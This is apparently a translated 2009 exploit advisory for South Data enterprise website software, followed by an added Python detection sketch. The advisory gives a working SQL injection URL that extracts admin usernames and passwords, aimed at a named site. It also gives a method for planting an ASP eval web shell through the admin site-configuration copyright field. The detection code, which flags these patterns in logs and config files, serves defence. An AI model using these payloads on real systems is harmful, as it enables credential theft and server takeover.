South Data enterprise: latest injection vulnerability

2009-06-27T00:00:00
ID MYHACK58:62200923678
Type myhack58
Reporter Anonymous
Modified 2009-06-27T00:00:00

Description


By: A XoL-! http://www.tsbct.com


Date found: 2008-09-25

Affected versions: v10.0, v11.0

Trojan:

http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20"='

Method for getting a shell:

In the website configuration page [http://www.target.com/admin/SiteConfig.asp], write "%><%eval(request(chr(35)))%><%' into the copyright information field. On success, the shell is written to http://www.target.com/inc/config.asp
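Detection sketch for the two behaviours described above, added here as an example and not part of the original advisory: it flags NewsType.asp requests whose SmallClass value carries SQL syntax, and checks the text of inc/config.asp for eval/execute applied to request input. The log layout, the sample lines and the shape of the config line are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# A quote, UNION ... SELECT or CHR( has no place in a category name (assumption).
SQLI = re.compile(r"'|\bunion\b.*\bselect\b|\bchr\s*\(", re.I | re.S)
# eval/execute applied directly to request input, as in the copyright-field payload.
EVAL = re.compile(r"\b(?:eval|execute)\s*\(\s*request\s*\(", re.I)

# Constructed log lines in a simplified "ip method target status" layout.
SAMPLE_LOG = [
    "203.0.113.5 GET /NewsType.asp?SmallClass=%E5%85%AC%E5%8F%B8%E6%96%B0%E9%97%BB 200",
    "198.51.100.7 GET /NewsType.asp?SmallClass=%27%20union%20select%200,1,2%20from%20news 200",
    "198.51.100.7 GET /newstype.asp?smallclass=%2527%2520and%25201=1 500",
    "203.0.113.9 GET /index.asp?id=3 200",
]
# Constructed config line holding the copyright value after the write described above.
SAMPLE_CONFIG = 'Const Copyright=""%><%eval(request(chr(35)))%><%\'"'

def suspicious_requests(log_lines):
    """Return (client_ip, decoded SmallClass) for NewsType.asp hits carrying SQL syntax."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # not in the assumed layout
        ip, target = fields[0], fields[2]
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/newstype.asp"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for key, values in params.items():
            if key.lower() != "smallclass":
                continue
            for value in values:
                value = unquote(value)  # second decode catches double-encoded input
                if SQLI.search(value):
                    hits.append((ip, value))
    return hits

def config_has_injected_code(config_text):
    """True if the config file text applies eval/execute to request input."""
    return bool(EVAL.search(config_text))

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(value))
    print("config flagged:", config_has_injected_code(SAMPLE_CONFIG))
```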